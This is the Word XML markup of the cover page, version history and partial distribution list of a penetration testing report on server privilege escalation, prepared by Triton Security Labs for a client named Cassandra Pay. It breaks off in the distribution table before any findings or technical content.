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1EC4" w14:textId="77777777" w:rsidR="000E57A4" w:rsidRDefault="00000000">
      <w:pPr>
        <w:pBdr>
          <w:top w:val="single" w:sz="14" w:space="0" w:color="8B0000"/>
          <w:bottom w:val="single" w:sz="6" w:space="0" w:color="8B0000"/>
        </w:pBdr>
        <w:spacing w:after="400"/>
        <w:jc w:val="center"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="8B0000"/>
          <w:spacing w:val="40"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>CONFIDENTIAL  •  TLP:AMBER  •  CLIENT-ONLY DISTRIBUTION</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="686A27F5" w14:textId="77777777" w:rsidR="000E57A4" w:rsidRDefault="00000000">
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:sz w:val="8"/>
          <w:szCs w:val="8"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4B8BCB47" w14:textId="77777777" w:rsidR="000E57A4" w:rsidRDefault="00000000">
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:sz w:val="8"/>
          <w:szCs w:val="8"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4D024480" w14:textId="77777777" w:rsidR="000E57A4" w:rsidRDefault="00000000">
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:sz w:val="8"/>
          <w:szCs w:val="8"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6B0AB6F1" w14:textId="77777777" w:rsidR="000E57A4" w:rsidRDefault="00000000">
      <w:pPr>
        <w:spacing w:after="40"/>
        <w:jc w:val="center"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:i/>
          <w:iCs/>
          <w:color w:val="404040"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>— Triton Security Labs —</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="15193097" w14:textId="77777777" w:rsidR="000E57A4" w:rsidRDefault="00000000">
      <w:pPr>
        <w:spacing w:after="800"/>
        <w:jc w:val="center"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="CCCCCC"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>[ PLACEHOLDER LOGO ]</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0269E00F" w14:textId="77777777" w:rsidR="000E57A4" w:rsidRDefault="00000000">
      <w:pPr>
        <w:spacing w:before="200" w:after="160"/>
        <w:jc w:val="center"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="1F3864"/>
          <w:sz w:val="44"/>
          <w:szCs w:val="44"/>
        </w:rPr>
        <w:t>PENETRATION TESTING REPORT</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="32C552B4" w14:textId="77777777" w:rsidR="000E57A4" w:rsidRDefault="00000000">
      <w:pPr>
        <w:spacing w:after="60"/>
        <w:jc w:val="center"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:i/>
          <w:iCs/>
          <w:color w:val="2E75B6"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>Production Server Privilege Escalation Assessment</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="57028029" w14:textId="77777777" w:rsidR="000E57A4" w:rsidRDefault="00000000">
      <w:pPr>
        <w:spacing w:after="200"/>
        <w:jc w:val="center"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:i/>
          <w:iCs/>
          <w:color w:val="2E75B6"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>and Pre-Vendor VM Review</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="15FB7B4A" w14:textId="77777777" w:rsidR="000E57A4" w:rsidRDefault="000E57A4">
      <w:pPr>
        <w:pBdr>
          <w:bottom w:val="single" w:sz="8" w:space="0" w:color="2E75B6"/>
        </w:pBdr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="6BB589EA" w14:textId="77777777" w:rsidR="000E57A4" w:rsidRDefault="00000000">
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:sz w:val="8"/>
          <w:szCs w:val="8"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2E78D384" w14:textId="77777777" w:rsidR="000E57A4" w:rsidRDefault="00000000">
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:sz w:val="8"/>
          <w:szCs w:val="8"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6C572C04" w14:textId="77777777" w:rsidR="000E57A4" w:rsidRDefault="00000000">
      <w:pPr>
        <w:spacing w:after="40"/>
        <w:jc w:val="center"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="404040"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>Prepared for</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="67409714" w14:textId="77777777" w:rsidR="000E57A4" w:rsidRDefault="00000000">
      <w:pPr>
        <w:spacing w:after="200"/>
        <w:jc w:val="center"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="1F3864"/>
          <w:sz w:val="32"/>
          <w:szCs w:val="32"/>
        </w:rPr>
        <w:t>Cassandra Pay</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="33F0BD3F" w14:textId="77777777" w:rsidR="000E57A4" w:rsidRDefault="00000000">
      <w:pPr>
        <w:spacing w:after="40"/>
        <w:jc w:val="center"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="1A1A1A"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>Engagement type:  External Black-Box Post-Exploitation Assessment</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3598F1B4" w14:textId="77777777" w:rsidR="000E57A4" w:rsidRDefault="00000000">
      <w:pPr>
        <w:spacing w:after="40"/>
        <w:jc w:val="center"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="1A1A1A"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>Engagement window:  12 April – 26 April 2026</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="477D5BBC" w14:textId="77777777" w:rsidR="000E57A4" w:rsidRDefault="00000000">
      <w:pPr>
        <w:spacing w:after="40"/>
        <w:jc w:val="center"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="1A1A1A"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>Document version:  1.0 (Initial Release)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2F3510DE" w14:textId="77777777" w:rsidR="000E57A4" w:rsidRDefault="00000000">
      <w:pPr>
        <w:spacing w:after="40"/>
        <w:jc w:val="center"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="1A1A1A"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>Publication date:  13 May 2026</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="21D4D8C3" w14:textId="77777777" w:rsidR="000E57A4" w:rsidRDefault="00000000">
      <w:pPr>
        <w:spacing w:after="800"/>
        <w:jc w:val="center"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="1A1A1A"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>Author:  Dmytro Bilozor, Lead Penetration Tester</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7D8C6895" w14:textId="77777777" w:rsidR="000E57A4" w:rsidRDefault="00000000">
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:sz w:val="8"/>
          <w:szCs w:val="8"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0E9521BB" w14:textId="77777777" w:rsidR="000E57A4" w:rsidRDefault="00000000">
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:sz w:val="8"/>
          <w:szCs w:val="8"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0A3BB151" w14:textId="77777777" w:rsidR="000E57A4" w:rsidRDefault="00000000">
      <w:pPr>
        <w:pBdr>
          <w:top w:val="single" w:sz="4" w:space="0" w:color="404040"/>
        </w:pBdr>
        <w:spacing w:before="400"/>
        <w:jc w:val="center"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:i/>
          <w:iCs/>
          <w:color w:val="404040"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>Do not distribute outside the named recipients in §1.2.  Reproduction by photocopy or scan is prohibited.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2F0E349D" w14:textId="77777777" w:rsidR="000E57A4" w:rsidRDefault="00000000">
      <w:r>
        <w:br w:type="page"/>
      </w:r>
    </w:p>
    <w:p w14:paraId="4F0529C0" w14:textId="77777777" w:rsidR="000E57A4" w:rsidRDefault="00000000">
      <w:pPr>
        <w:pStyle w:val="Heading1"/>
        <w:pBdr>
          <w:bottom w:val="single" w:sz="4" w:space="0" w:color="2E75B6"/>
        </w:pBdr>
      </w:pPr>
      <w:bookmarkStart w:id="0" w:name="_Toc229906560"/>
      <w:r>
        <w:lastRenderedPageBreak/>
        <w:t>Document Metadata</w:t>
      </w:r>
      <w:bookmarkEnd w:id="0"/>
    </w:p>
    <w:p w14:paraId="141F85DE" w14:textId="77777777" w:rsidR="000E57A4" w:rsidRDefault="00000000">
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:sz w:val="8"/>
          <w:szCs w:val="8"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="185F4455" w14:textId="77777777" w:rsidR="000E57A4" w:rsidRDefault="00000000">
      <w:pPr>
        <w:pStyle w:val="Heading3"/>
      </w:pPr>
      <w:bookmarkStart w:id="1" w:name="_Toc229906561"/>
      <w:r>
        <w:t>Version history</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1700"/>
        <w:gridCol w:w="4326"/>
      </w:tblGrid>
      <w:tr w:rsidR="000E57A4" w14:paraId="21756D9F" w14:textId="77777777">
        <w:tblPrEx>
          <w:tblCellMar>
            <w:top w:w="0" w:type="dxa"/>
            <w:bottom w:w="0" w:type="dxa"/>
          </w:tblCellMar>
        </w:tblPrEx>
        <w:trPr>
          <w:cantSplit/>
          <w:tblHeader/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="15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19CD2A94" w14:textId="77777777" w:rsidR="000E57A4" w:rsidRDefault="00000000">
            <w:pPr>
              <w:spacing w:before="40" w:after="40"/>
              <w:jc w:val="center"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:eastAsia="Arial" w:hAnsi="Arial" w:cs="Arial"/>
                <w:b/>
                <w:bCs/>
                <w:color w:val="1F3864"/>
              </w:rPr>
              <w:t>Version</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="15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6EE71DFE" w14:textId="77777777" w:rsidR="000E57A4" w:rsidRDefault="00000000">
            <w:pPr>
              <w:spacing w:before="40" w:after="40"/>
              <w:jc w:val="center"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:eastAsia="Arial" w:hAnsi="Arial" w:cs="Arial"/>
                <w:b/>
                <w:bCs/>
                <w:color w:val="1F3864"/>
              </w:rPr>
              <w:t>Date</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="17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33769C40" w14:textId="77777777" w:rsidR="000E57A4" w:rsidRDefault="00000000">
            <w:pPr>
              <w:spacing w:before="40" w:after="40"/>
              <w:jc w:val="center"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:eastAsia="Arial" w:hAnsi="Arial" w:cs="Arial"/>
                <w:b/>
                <w:bCs/>
                <w:color w:val="1F3864"/>
              </w:rPr>
              <w:t>Author</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="43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68550A34" w14:textId="77777777" w:rsidR="000E57A4" w:rsidRDefault="00000000">
            <w:pPr>
              <w:spacing w:before="40" w:after="40"/>
              <w:jc w:val="center"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:eastAsia="Arial" w:hAnsi="Arial" w:cs="Arial"/>
                <w:b/>
                <w:bCs/>
                <w:color w:val="1F3864"/>
              </w:rPr>
              <w:t>Change description</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="000E57A4" w14:paraId="4C4B6891" w14:textId="77777777">
        <w:tblPrEx>
          <w:tblCellMar>
            <w:top w:w="0" w:type="dxa"/>
            <w:bottom w:w="0" w:type="dxa"/>
          </w:tblCellMar>
        </w:tblPrEx>
        <w:trPr>
          <w:cantSplit/>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0FB227D" w14:textId="77777777" w:rsidR="000E57A4" w:rsidRDefault="00000000">
            <w:pPr>
              <w:spacing w:before="40" w:after="40"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:eastAsia="Arial" w:hAnsi="Arial" w:cs="Arial"/>
              </w:rPr>
              <w:t>0.1 (draft)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D66D1F4" w14:textId="77777777" w:rsidR="000E57A4" w:rsidRDefault="00000000">
            <w:pPr>
              <w:spacing w:before="40" w:after="40"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:eastAsia="Arial" w:hAnsi="Arial" w:cs="Arial"/>
              </w:rPr>
              <w:t>24 Apr 2026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C914E7D" w14:textId="77777777" w:rsidR="000E57A4" w:rsidRDefault="00000000">
            <w:pPr>
              <w:spacing w:before="40" w:after="40"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:eastAsia="Arial" w:hAnsi="Arial" w:cs="Arial"/>
              </w:rPr>
              <w:t>D. Bilozor</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D7CEAE0" w14:textId="77777777" w:rsidR="000E57A4" w:rsidRDefault="00000000">
            <w:pPr>
              <w:spacing w:before="40" w:after="40"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:eastAsia="Arial" w:hAnsi="Arial" w:cs="Arial"/>
              </w:rPr>
              <w:t>Internal draft after technical phase; raw findings, no executive layer.</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="000E57A4" w14:paraId="0D0240BA" w14:textId="77777777">
        <w:tblPrEx>
          <w:tblCellMar>
            <w:top w:w="0" w:type="dxa"/>
            <w:bottom w:w="0" w:type="dxa"/>
          </w:tblCellMar>
        </w:tblPrEx>
        <w:trPr>
          <w:cantSplit/>
        </w:trPr>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3F770AD" w14:textId="77777777" w:rsidR="000E57A4" w:rsidRDefault="00000000">
            <w:pPr>
              <w:spacing w:before="40" w:after="40"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:eastAsia="Arial" w:hAnsi="Arial" w:cs="Arial"/>
              </w:rPr>
              <w:t>0.5 (review)</w:t>
            </w:r>
          </w:p>
        </w:tc>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6AA42D6" w14:textId="77777777" w:rsidR="000E57A4" w:rsidRDefault="00000000">
            <w:pPr>
              <w:spacing w:before="40" w:after="40"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:eastAsia="Arial" w:hAnsi="Arial" w:cs="Arial"/>
              </w:rPr>
              <w:t>28 Apr 2026</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="17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CD2E91B" w14:textId="77777777" w:rsidR="000E57A4" w:rsidRDefault="00000000">
            <w:pPr>
              <w:spacing w:before="40" w:after="40"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:eastAsia="Arial" w:hAnsi="Arial" w:cs="Arial"/>
              </w:rPr>
              <w:t>D. Bilozor</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="43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124570BA" w14:textId="77777777" w:rsidR="000E57A4" w:rsidRDefault="00000000">
            <w:pPr>
              <w:spacing w:before="40" w:after="40"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:eastAsia="Arial" w:hAnsi="Arial" w:cs="Arial"/>
              </w:rPr>
              <w:t>Internal QA review with peer; severity re-scored, finding F1 elevated from CVSS 7.8 to 8.8 (scope change).</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="000E57A4" w14:paraId="6B76BD03" w14:textId="77777777">
        <w:tblPrEx>
          <w:tblCellMar>
            <w:top w:w="0" w:type="dxa"/>
            <w:bottom w:w="0" w:type="dxa"/>
          </w:tblCellMar>
        </w:tblPrEx>
        <w:trPr>
          <w:cantSplit/>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A79D90B" w14:textId="77777777" w:rsidR="000E57A4" w:rsidRDefault="00000000">
            <w:pPr>
              <w:spacing w:before="40" w:after="40"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:eastAsia="Arial" w:hAnsi="Arial" w:cs="Arial"/>
              </w:rPr>
              <w:t>1.0 (Initial Release)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F883AB0" w14:textId="77777777" w:rsidR="000E57A4" w:rsidRDefault="00000000">
            <w:pPr>
              <w:spacing w:before="40" w:after="40"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:eastAsia="Arial" w:hAnsi="Arial" w:cs="Arial"/>
              </w:rPr>
              <w:t>13 May 2026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840348C" w14:textId="77777777" w:rsidR="000E57A4" w:rsidRDefault="00000000">
            <w:pPr>
              <w:spacing w:before="40" w:after="40"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:eastAsia="Arial" w:hAnsi="Arial" w:cs="Arial"/>
              </w:rPr>
              <w:t>D. Bilozor</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22CCB0E" w14:textId="77777777" w:rsidR="000E57A4" w:rsidRDefault="00000000">
            <w:pPr>
              <w:spacing w:before="40" w:after="40"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:eastAsia="Arial" w:hAnsi="Arial" w:cs="Arial"/>
              </w:rPr>
              <w:t>Final client deliverable. PTES-compliant structure, full Roadmap appendix.</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p w14:paraId="453E0FA1" w14:textId="77777777" w:rsidR="000E57A4" w:rsidRDefault="00000000">
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:sz w:val="8"/>
          <w:szCs w:val="8"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="78EA70C5" w14:textId="77777777" w:rsidR="000E57A4" w:rsidRDefault="00000000">
      <w:pPr>
        <w:pStyle w:val="Heading3"/>
      </w:pPr>
      <w:bookmarkStart w:id="2" w:name="_Toc229906562"/>
      <w:r>
        <w:t>Distribution list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600"/>
        <w:gridCol w:w="4126"/>
      </w:tblGrid>
      <w:tr w:rsidR="000E57A4" w14:paraId="0F1B0F41" w14:textId="77777777">
        <w:tblPrEx>
          <w:tblCellMar>
            <w:top w:w="0" w:type="dxa"/>
            <w:bottom w:w="0" w:type="dxa"/>
          </w:tblCellMar>
        </w:tblPrEx>
        <w:trPr>
          <w:cantSplit/>
          <w:tblHeader/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="23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54F53B3D" w14:textId="77777777" w:rsidR="000E57A4" w:rsidRDefault="00000000">
            <w:pPr>
              <w:spacing w:before="40" w:after="40"/>
              <w:jc w:val="center"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:eastAsia="Arial" w:hAnsi="Arial" w:cs="Arial"/>
                <w:b/>
                <w:bCs/>
                <w:color w:val="1F3864"/>
              </w:rPr>
              <w:t>Role</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="26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5EEE6ECC" w14:textId="77777777" w:rsidR="000E57A4" w:rsidRDefault="00000000">
            <w:pPr>
              <w:spacing w:before="40" w:after="40"/>
              <w:jc w:val="center"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:eastAsia="Arial" w:hAnsi="Arial" w:cs="Arial"/>
                <w:b/>
                <w:bCs/>
                <w:color w:val="1F3864"/>
              </w:rPr>
              <w:t>Name / Title</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="41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7C1D6791" w14:textId="77777777" w:rsidR="000E57A4" w:rsidRDefault="00000000">
            <w:pPr>
              <w:spacing w:before="40" w:after="40"/>
              <w:jc w:val="center"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:eastAsia="Arial" w:hAnsi="Arial" w:cs="Arial"/>
                <w:b/>
                <w:bCs/>
                <w:color w:val="1F3864"/>
              </w:rPr>
              <w:t>Notes</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="000E57A4" w14:paraId="57EA0127" w14:textId="77777777">
        <w:tblPrEx>
          <w:tblCellMar>
            <w:top w:w="0" w:type="dxa"/>
            <w:bottom w:w="0" w:type="dxa"/>
          </w:tblCellMar>
        </w:tblPrEx>
        <w:trPr>
          <w:cantSplit/>
        </w:trPr>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C24E18B" w14:textId="77777777" w:rsidR="000E57A4" w:rsidRDefault="00000000">
            <w:pPr>
              <w:spacing w:before="40" w:after="40"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:eastAsia="Arial" w:hAnsi="Arial" w:cs="Arial"/>
              </w:rPr>
              <w:t>Chief Information Security Officer (CISO)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DED5C6D" w14:textId="77777777" w:rsidR="000E57A4" w:rsidRDefault="00000000">
            <w:pPr>
              <w:spacing w:before="40" w:after="40"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:eastAsia="Arial" w:hAnsi="Arial" w:cs="Arial"/>
              </w:rPr>
              <w:t>A. Volkova, Cassandra Pay</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5FF8DA7" w14:textId="77777777" w:rsidR="000E57A4" w:rsidRDefault="00000000">
            <w:pPr>
              <w:spacing w:before="40" w:after="40"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:eastAsia="Arial" w:hAnsi="Arial" w:cs="Arial"/>
              </w:rPr>
              <w:t>Primary technical recipient; owns remediation tracking.</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="000E57A4" w14:paraId="4DC504E8" w14:textId="77777777">
        <w:tblPrEx>
          <w:tblCellMar>
            <w:top w:w="0" w:type="dxa"/>
            <w:bottom w:w="0" w:type="dxa"/>
          </w:tblCellMar>
        </w:tblPrEx>
        <w:trPr>
          <w:cantSplit/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="23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73B2BEE" w14:textId="77777777" w:rsidR="000E57A4" w:rsidRDefault="00000000">
            <w:pPr>
              <w:spacing w:before="40" w:after="40"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:eastAsia="Arial" w:hAnsi="Arial" w:cs="Arial"/>
              </w:rPr>
              <w:t>Chief Information Officer (CIO)</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4111F7B" w14:textId="77777777" w:rsidR="000E57A4" w:rsidRDefault="00000000">
            <w:pPr>
              <w:spacing w:before="40" w:after="40"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:eastAsia="Arial" w:hAnsi="Arial" w:cs="Arial"/>
              </w:rPr>
              <w:t>M. Ahmadov, Cassandra Pay</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="41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FF1793D" w14:textId="77777777" w:rsidR="000E57A4" w:rsidRDefault="00000000">
            <w:pPr>
              <w:spacing w:before="40" w:after="40"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:eastAsia="Arial" w:hAnsi="Arial" w:cs="Arial"/>
              </w:rPr>
              <w:t>Technology-budget approval; reads Roadmap (Part 7).</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="000E57A4" w14:paraId="6C0CC2E3" w14:textId="77777777">
        <w:tblPrEx>
          <w:tblCellMar>
            <w:top w:w="0" w:type="dxa"/>
            <w:bottom w:w="0" w:type="dxa"/>
          </w:tblCellMar>
        </w:tblPrEx>
        <w:trPr>
          <w:cantSplit/>
        </w:trPr>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A5A19C4" w14:textId="77777777" w:rsidR="000E57A4" w:rsidRDefault="00000000">
            <w:pPr>
              <w:spacing w:before="40" w:after="40"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:eastAsia="Arial" w:hAnsi="Arial" w:cs="Arial"/>
              </w:rPr>
              <w:t>Chief Financial Officer (CFO)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D9B33BF" w14:textId="77777777" w:rsidR="000E57A4" w:rsidRDefault="00000000">
            <w:pPr>
              <w:spacing w:before="40" w:after="40"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:eastAsia="Arial" w:hAnsi="Arial" w:cs="Arial"/>
              </w:rPr>
              <w:t>S. Petrov, Cassandra Pay</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61CDB10" w14:textId="77777777" w:rsidR="000E57A4" w:rsidRDefault="00000000">
            <w:pPr>
              <w:spacing w:before="40" w:after="40"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:eastAsia="Arial" w:hAnsi="Arial" w:cs="Arial"/>
              </w:rPr>
              <w:t>Reads Executive Summary; budget signoff for Roadmap.</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="000E57A4" w14:paraId="2BF08AFF" w14:textId="77777777">
        <w:tblPrEx>
          <w:tblCellMar>
            <w:top w:w="0" w:type="dxa"/>
            <w:bottom w:w="0" w:type="dxa"/>
          </w:tblCellMar>
        </w:tblPrEx>
        <w:trPr>
          <w:cantSplit/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="23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09D62A5" w14:textId="77777777" w:rsidR="000E57A4" w:rsidRDefault="00000000">
            <w:pPr>
              <w:spacing w:before="40" w:after="40"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:eastAsia="Arial" w:hAnsi="Arial" w:cs="Arial"/>
              </w:rPr>
              <w:t>General Counsel</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0DE283C" w14:textId="77777777" w:rsidR="000E57A4" w:rsidRDefault="00000000">
            <w:pPr>
              <w:spacing w:before="40" w:after="40"/>
